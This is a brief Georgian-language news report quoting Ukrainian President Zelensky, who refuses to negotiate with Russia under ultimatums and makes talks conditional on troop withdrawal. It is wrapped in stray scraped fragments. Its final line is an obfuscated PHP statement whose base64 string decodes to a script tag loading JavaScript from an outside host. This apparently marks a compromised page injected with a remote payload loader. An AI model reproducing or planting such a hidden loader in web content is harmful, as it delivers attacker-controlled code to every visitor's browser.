celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი აცხადებს, რომ რუსეთისგან კონსტრუქციული მოლაპარაკების სურვილს ვერ ხედავს და ის არ აპირებს დაელაპარაკოს მათ, ვინც ულტიმატუმებს აყენებს.
 
ზელენსკის თქმით, მოლაპარაკებები მხოლოდ მა შემდეგ დაიწყება, რაც აგრესორი უკრაინის ტერიტორიიდან თავის ჯარებს გაიყვანს.
 
"ჩვენი მებრძოლების ქმედებები უკრაინის სამხრეთით ჩრდილოეთით და აღმოსავლეთით ყველა აღნიშნავს და ხაზს უსვამს. დარწმუნებული ვარ, ჩვენ საზღვრებამდე გახვალთ და მტრის ზურგს დაინახავთ. მე ვერ ვხედავ რუსეთისგან კონსტრუქციული მოლაპარაკების სურვილს. რაც შეეხება მათ ულტიმატუმებს, არ მაინტერესებს ვინ წამოაყენა ეს ულტიმატუმები, პუტინმა თუ ვინმე სხვამ, ეს არის ჩემი პრინციპი, არ დაველაპარაკები მათ, ვინც ულტიმატუმებს მიყენებს. რუსეთთან მოლაპარაკებების დაწყება, მხოლოდ მას შემდეგ იქნება შესაძლებელი, რაც აგრესორი უკრაინის ტერიტორიიდან თავის ჯარებს გაიყვანს", - თქვა ვოლოდიმირ ზელენსკიმ.
537
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");